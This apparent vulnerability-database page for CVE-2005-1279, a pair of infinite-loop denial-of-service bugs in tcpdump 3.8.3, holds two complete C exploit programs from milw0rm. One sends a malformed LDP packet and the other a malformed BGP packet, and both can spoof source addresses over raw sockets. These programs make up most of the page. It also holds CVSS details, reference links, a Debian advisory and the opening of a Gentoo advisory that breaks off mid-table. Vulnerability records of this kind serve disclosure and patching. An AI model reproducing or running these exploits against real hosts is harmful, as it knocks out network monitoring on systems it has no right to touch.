CVE-2005-1279
CVSS 5.0
Published: 2005-05-02 00:00:00
Revised: 2013-08-19 00:40:49

[Original] tcpdump 3.8.3 and earlier allows remote attackers to cause a denial of service (infinite loop) via a crafted (1) BGP packet, which is not properly handled by RT_ROUTING_INFO, or (2) LDP packet, which is not properly handled by the ldp_print function.


[CNNVD] TCPDump LDP Denial of Service Vulnerability (CNNVD-200505-752)

        TCPDump is a free network analysis program that runs on many Unix operating systems.
        TCPDump's decoding of the LDP protocol contains a vulnerability that a remote attacker may exploit to cause a denial of service.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9601
tcpdump 3.8.3 and earlier allows remote attackers to cause a denial of service (infinite loop) via a crafted (1) BGP packet, which is not pr...
*OVAL describes in detail how to detect this vulnerability; more technical details on detection can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1279
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1279
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-752
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/396932
(VENDOR_ADVISORY)  BUGTRAQ  20050426 tcpdump[v3.8.x/v3.9.1]: ISIS, BGP, and LDP infinite loop DOS exploits.
http://www.redhat.com/support/errata/RHSA-2005-421.html
(UNKNOWN)  REDHAT  RHSA-2005:421
http://www.redhat.com/support/errata/RHSA-2005-417.html
(UNKNOWN)  REDHAT  RHSA-2005:417
http://www.securityfocus.com/bid/13389
(UNKNOWN)  BID  13389
http://www.securityfocus.com/archive/1/archive/1/430292/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:156139
http://www.debian.org/security/2005/dsa-850
(UNKNOWN)  DEBIAN  DSA-850
http://secunia.com/advisories/18146
(UNKNOWN)  SECUNIA  18146
http://secunia.com/advisories/17101
(UNKNOWN)  SECUNIA  17101
http://secunia.com/advisories/15125
(UNKNOWN)  SECUNIA  15125
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.60/SCOSA-2005.60.txt
(UNKNOWN)  SCO  SCOSA-2005.60

- Vulnerability information

TCPDump LDP Denial of Service Vulnerability
Medium Other
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
        TCPDump is a free network analysis program that runs on many Unix operating systems.
        TCPDump's decoding of the LDP protocol contains a vulnerability that a remote attacker may exploit to cause a denial of service.

- Advisories and patches

        The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:
        http://www.tcpdump.org

- Vulnerability information (957)

Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit (EDBID:957)
linux dos
2005-04-26 Verified
0 vade79
N/A
/*[ tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS. ]********* 
 *                                                                *
 * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-ldp-dos.c -o xtcpdump-ldp-dos                    *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * fix:                                                           *
 *  this appears to have been fixed in the alpha 3.9.x / CVS      *
 *  versions.  although i found no direct mention of the issue    *
 *  itself being resolved, the code has been changed in a way to  *
 *  not allow this to happen.                                     *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.8.3 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (LDP) packet  *
 * causing an infinite loop.                                      *
 *                                                                *
 * LDP is UDP(/TCP), so no LDP service has to actually be running *
 * to abuse this issue, spoofed or not spoofed.  depending on the *
 * path the packet takes spoofed packets may be dropped(dropped   *
 * at your router most likely), in such a case non-spoofed        *
 * packets have the same effect, they just show your ip.          *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen,        *
 * however most need the "-v" argument.                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define LDP_PORT 646
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct udph{
  unsigned short source;
  unsigned short dest;
  unsigned short len;
  unsigned short check;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed LDP data. (the bug) */
static char payload[]=
 "\x00\x01\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\x00\x00\xff\xff\xff\xff";

/* prototypes. (and sig_alarm) */
void ldp_nospoof(unsigned int);
void ldp_spoof(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(int sig){(void)sig;printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS."
 "\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2){
  if(strstr(argv[2],"nospoof"))nospoof=1;
  else saddr=getip(argv[2]);
 }
 if(argc>3)amt=atoi(argv[3]);
 if(!amt)printe("no packets?",1);
 printf("[*] destination\t: %s\n",argv[1]);
 if(!nospoof)
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
 printf("[*] amount\t: %u\n\n",amt);
 printf("[+] sending(packet = .): ");
 fflush(stdout);
 while(amt--){
  /* spice things up. */
  srandom(time(0)+amt);
  if(nospoof)ldp_nospoof(daddr);
  else ldp_spoof(daddr,saddr);
  printf(".");
  fflush(stdout);
  usleep(50000);
 }
 printf("\n\n[*] done.\n");
 fflush(stdout);
 exit(0);
}
/* (non-spoofed) sends a (LDP) udp packet. */
void ldp_nospoof(unsigned int daddr){
 signed int sock;
 struct sockaddr_in sa;
 sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
 sa.sin_family=AF_INET;
 sa.sin_port=htons(LDP_PORT);
 sa.sin_addr.s_addr=daddr;
 /* sendto() returns ssize_t; compare in signed space so -1 is caught. */
 if(sendto(sock,payload,sizeof(payload)-1,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))!=(ssize_t)(sizeof(payload)-1))
  printe("failed to send non-spoofed LDP packet.",1);
 close(sock);
 return;
}
/* (spoofed) generates and sends a (LDP) udp packet. */
void ldp_spoof(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct udph udp;
 struct sumh sum;
 /* create raw (UDP) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_UDP))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(LDP_PORT);
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct udph)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&udp,0,sizeof(struct udph));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_UDP;
 ip.frag_off=64;
 udp.source=htons(random()%60000+1025);
 udp.dest=htons(LDP_PORT);
 udp.len=htons(sizeof(struct udph)+sizeof(payload)-1);
 /* needed for (correct) checksums. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct udph)+sizeof(payload)-1);
 /* make sum/calc buffer for the udp checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct udph)
 +sizeof(payload)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct sumh)+sizeof(struct udph)
 +sizeof(payload)+1));
 memcpy(s,&sum,sizeof(struct sumh));
 memcpy(s+sizeof(struct sumh),&udp,sizeof(struct udph));
 memcpy(s+sizeof(struct sumh)+sizeof(struct udph),
 payload,sizeof(payload)-1);
 udp.check=in_cksum((unsigned short *)s,
 sizeof(struct sumh)+sizeof(struct udph)+sizeof(payload)-1);
 free(s);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&udp,sizeof(struct udph));
 memcpy(p+(sizeof(struct iph)+sizeof(struct udph)),
 payload,sizeof(payload));
 /* send the malformed LDP packet. */
 /* sendto() returns ssize_t; compare in signed space so -1 is caught. */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))!=(ssize_t)psize)
  printe("failed to send forged LDP packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}

// milw0rm.com [2005-04-26]

- Vulnerability information (958)

Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit (EDBID:958)
linux dos
2005-04-26 Verified
0 vade79
N/A
/*[ tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS. ]***** 
 *                                                                *
 * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos                    *
 *  gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos -D_USE_SYN         *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * fix:                                                           *
 *  this appears to have been fixed in the alpha 3.9.x / CVS      *
 *  versions.  although i found no direct mention of the issue    *
 *  itself being resolved, the code has been changed in a way to  *
 *  not allow this to happen.                                     *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.8.3 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (BGP) packet  *
 * causing an infinite loop.                                      *
 *                                                                *
 * BGP is TCP, however the victim does not have to have the BGP   *
 * port(179) open to abuse the bug.  by sending a specially       *
 * crafted (spoofed) TCP(ACK,PUSH) packet to port 179 you can     *
 * trigger the infinite loop, however it depends on if the packet *
 * can make it out without being dropped.  in some situations the *
 * source host/ip used must be within your local subnet(or your   *
 * actual ip) for the (spoofed) packet to make it past your own   *
 * router.  if for some reason you think a (invalid) TCP(SYN)     *
 * packet is more likely to make it out, compile with the         *
 * -D_USE_SYN flag. (tcpdump will parse the BGP data even if it   *
 * is a TCP(SYN) packet)                                          *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen.        *
 * however most need the "-v" argument, and a some need the       *
 * "-s" (snaplen) set to 88(non-spoofed is around 100, with the   *
 * ip options) or more.                                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define BGP_PORT 179
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct tcph{
 unsigned short source;
 unsigned short dest;
 unsigned int seq;
 unsigned int ack_seq;
#ifdef _USE_BIG_ENDIAN
 unsigned short doff:4,res1:4,cwr:1,ece:1,
 urg:1,ack:1,psh:1,rst:1,syn:1,fin:1;
#else
 unsigned short res1:4,doff:4,fin:1,syn:1,
 rst:1,psh:1,ack:1,urg:1,ece:1,cwr:1;
#endif
 unsigned short window;
 unsigned short check;
 unsigned short urg_ptr;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed BGP data. (the bug) */
static char payload[]=
 /* shortened method. (34 bytes) */
 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00"
 "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01"
 "\x84\x00\x00\x00";
 /* original method, un-comment/swap if desired. (39 bytes) */
 /* "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" */
 /* "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00" */
 /* "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01" */
 /* "\x84\x00\x00\x20\x00\x00\x00\x00\x00"; */

/* prototypes. (and sig_alarm) */
void bgp_connect(unsigned int);
void bgp_inject(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(int sig){(void)sig;printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop "
 "DOS.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2){
  if(strstr(argv[2],"nospoof"))nospoof=1;
  else saddr=getip(argv[2]);
 }
 if(argc>3)amt=atoi(argv[3]);
 if(nospoof){
  printf("[*] target: %s\n",argv[1]);
  bgp_connect(daddr);
  printf("[*] done.\n");
 }
 else{
  if(!amt)printe("no packets?",1);
  printf("[*] destination\t: %s\n",argv[1]);
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
  printf("[*] amount\t: %u\n\n",amt);
  printf("[+] sending(packet = .): ");
  fflush(stdout);
  while(amt--){
   /* spice things up. */
   srandom(time(0)+amt);
   bgp_inject(daddr,saddr);
   printf(".");
   fflush(stdout);
   usleep(50000);
  }
  printf("\n\n[*] done.\n");
 }
 fflush(stdout);
 exit(0);
}
/* (non-spoofed) generic connection. (port 179 on the */
/* victim has to be open for this to work) */
void bgp_connect(unsigned int daddr){
 signed int sock;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(BGP_PORT);
 s.sin_addr.s_addr=daddr;
 printf("[*] attempting to connect...\n");
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("(non-spoofed) BGP connection failed.",1);
 alarm(0);
 printf("[*] successfully connected.\n");
 printf("[*] sending malformed BGP data. (%zu bytes)\n",
 sizeof(payload)-1);
 usleep(500000);
 write(sock,payload,sizeof(payload));
 usleep(500000);
 printf("[*] closing connection.\n\n");
 close(sock);
 return;
}
/* (spoofed) generates and sends an unestablished (BGP) */
/* TCP(ACK,PUSH) or TCP(SYN) packet. */
void bgp_inject(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct tcph tcp;
 struct sumh sum;
 /* create raw (TCP) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(BGP_PORT);
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct tcph)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&tcp,0,sizeof(struct tcph));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.id=(random()%65535);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_TCP;
 ip.frag_off=64;
 tcp.seq=(random()%0xffffffff+1);
 tcp.source=htons(random()%60000+1025);
 tcp.dest=sa.sin_port;
 /* passing BGP data as ip options for the syn packet method */
 /* doesn't work as tcpdump doesnt process it as BGP data. */
 tcp.doff=5;
#ifdef _USE_SYN
 tcp.syn=1;
 tcp.window=htons(65535);
#else
 tcp.ack=1;
 tcp.psh=1;
 tcp.ack_seq=(random()%0xffffffff+1);
 tcp.window=htons(4096*(random()%2+1));
#endif
 /* needed for (correct) checksums. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct tcph)+sizeof(payload)-1);
 /* make sum/calc buffer for the tcp checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct tcph)
 +sizeof(payload)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct sumh)+sizeof(struct tcph)
 +sizeof(payload)+1));
 memcpy(s,&sum,sizeof(struct sumh));
 memcpy(s+sizeof(struct sumh),&tcp,sizeof(struct tcph));
 memcpy(s+sizeof(struct sumh)+sizeof(struct tcph),
 payload,sizeof(payload)-1);
 tcp.check=in_cksum((unsigned short *)s,
 sizeof(struct sumh)+sizeof(struct tcph)+sizeof(payload)-1);
 free(s);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&tcp,sizeof(struct tcph));
 memcpy(p+(sizeof(struct iph)+sizeof(struct tcph)),
 payload,sizeof(payload));
 /* send the malformed BGP packet. */
 /* sendto() returns ssize_t; compare in signed space so -1 is caught. */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))!=(ssize_t)psize)
  printe("failed to send forged BGP packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}

// milw0rm.com [2005-04-26]

- Vulnerability information (F40555)

Debian Linux Security Advisory 850-1 (PacketStormID:F40555)
2005-10-11 00:00:00
Debian  security.debian.org
advisory,denial of service
linux,debian
CVE-2005-1279

Debian Security Advisory DSA 850-1 - Vade 79 discovered that the BGP dissector in tcpdump, a powerful tool for network monitoring and data acquisition, does not properly handle RT_ROUTING_INFO. A specially crafted BGP packet can cause a denial of service via an infinite loop.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 850-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 9th, 2005                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : tcpdump
Vulnerability  : infinite loop
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-1279

"Vade 79" discovered that the BGP dissector in tcpdump, a powerful
tool for network monitoring and data acquisition, does not properly
handle RT_ROUTING_INFO.  A specially crafted BGP packet can cause a
denial of service via an infinite loop.

For the old stable distribution (woody) this problem has been fixed in
version 3.6.2-2.9.

For the stable distribution (sarge) this problem has been fixed in
version 3.8.3-4.

For the unstable distribution (sid) this problem has been fixed in
version 3.8.3-4.

We recommend that you upgrade your tcpdump package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9.dsc
      Size/MD5 checksum:      587 fac8be69ffc0fc9e98f720df652c3b8b
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9.diff.gz
      Size/MD5 checksum:    14189 09abe4d2c22c16aad175edf0e2d1e4a2
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2.orig.tar.gz
      Size/MD5 checksum:   380635 6bc8da35f9eed4e675bfdf04ce312248

  Alpha architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_alpha.deb
      Size/MD5 checksum:   214820 9c3c9a0fb94f149144f4379c0f9b4071

  ARM architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_arm.deb
      Size/MD5 checksum:   180762 bad61479d23cad44448f7fb91a9d6355

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_i386.deb
      Size/MD5 checksum:   170594 4f94b2909aed2bc2a308cf08d2d16208

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_ia64.deb
      Size/MD5 checksum:   253760 9c75cf903731d747f95a90b25f0a5de1

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_hppa.deb
      Size/MD5 checksum:   196882 61d38516880cae6a195120d09e866430

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_m68k.deb
      Size/MD5 checksum:   158494 a87ff72914ae89e87ad510993c162c8b

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_mips.deb
      Size/MD5 checksum:   189980 11df907857746a04ca58a8a71ff53242

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_mipsel.deb
      Size/MD5 checksum:   194374 6d8cf0ee59fc4da2b09dfde3cc1d74e8

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_powerpc.deb
      Size/MD5 checksum:   178012 3ad9b8f3a9df2732329ad98e3c156018

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_s390.deb
      Size/MD5 checksum:   175390 892a544d87e3de60b2888b77442334da

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_sparc.deb
      Size/MD5 checksum:   180826 0931640053a722312cd48ed47b2fbafd


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDSKNVW5ql+IAeqTIRAuloAKC41wzfQ33Crg0oFYuiQz4W/27hAQCbBhjZ
kYzu9XQYIFrFJOkcTIM+hPs=
=1KMn
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

- Vulnerability information (F38413)

Gentoo Linux Security Advisory 200505-6 (PacketStormID:F38413)
2005-07-02 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-1279,CVE-2005-1280

Gentoo Linux Security Advisory GLSA 200505-06 - TCPDump improperly handles and decodes ISIS, BGP, LDP (CVE-2005-1279) and RSVP (CVE-2005-1280) packets. TCPDump might loop endlessly after receiving malformed packets. Versions less than 3.8.3-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200505-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: TCPDump: Decoding routines Denial of Service vulnerability
      Date: May 09, 2005
      Bugs: #90541
        ID: 200505-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A flaw in the decoding of network packets renders TCPDump vulnerable to
a remote Denial of Service attack.

Background
==========

TCPDump is a tool for network monitoring and data acquisition.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
